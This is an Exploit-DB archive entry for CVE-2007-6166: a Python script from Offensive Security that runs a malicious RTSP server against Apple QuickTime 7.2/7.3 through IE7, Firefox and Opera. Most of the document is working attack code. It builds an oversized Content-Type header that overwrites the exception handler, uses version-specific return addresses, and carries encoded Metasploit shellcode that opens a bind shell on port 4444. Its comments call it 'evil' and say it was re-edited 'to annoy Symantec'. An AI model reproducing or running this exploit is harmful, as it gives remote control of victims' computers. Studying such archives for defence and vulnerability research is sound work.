Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit IE7/FF/Opera

2007-11-26T00:00:00
ID EDB-ID:4657
Type exploitdb
Reporter muts
Modified 2007-11-26T00:00:00

Description

Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera). CVE-2007-6166. Remote exploit for windows platform

                                        
                                            #!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...  
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################  
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,  
# the attack appears to be prevented because standard buffer overflow  
# prevention processes act before any damage can be done, Florio wrote.  
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,  
# the exploit works against Firefox if QuickTime is the default multimedia player,  
# according to Florio."
##########################################################################
# Calling Quicktime via URL kicks in an Extra Exception Handler,  
# of which we have no control over.
# By making the buffer larger than the original exploit, we can overwrite  
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
 
from socket import *
 
header = (
'RTSP/1.0 200 OK\r\n'
'CSeq: 1\r\n'
'Date: 0x00 :P\r\n'
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'
'Content-Type: %s\r\n' # <-- overflow
'Content-Length: %d\r\n'
'\r\n')
 
body = (
'v=0\r\n'
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'i=1.mp3\r\n'
't=0 0\r\n'
'a=tool:ciamciaramcia\r\n'
'a=type:broadcast\r\n'
'a=control:*\r\n'
'a=range:npt=0-213.077\r\n'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'
'a=x-qt-text-inf:1.mp3\r\n'
'm=audio 0 RTP/AVP 14\r\n'
'c=IN IP4 0.0.0.0\r\n'
'a=control:track1\r\n'
)
 
# ExitProcess shellcode will kill browser, but keep the shell open
 
shellcode =(# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")
 
tmp = "A" * 987
tmp +="\xeb\x20\x90\x90"  # short jump for 7.2
tmp +="\xeb\x20\x9c\x66"  # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="\x4e\x28\x86\x66"  # 6686284e | pop pop ret for 7.3
tmp += "\x90" * 92
tmp += shellcode
tmp += "\x41" * int(30000-len(shellcode))    # play with this buffer if you still get exceptions.  
 
header %= (tmp, len(body))
evil = header + body
 
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()

# milw0rm.com [2007-11-26]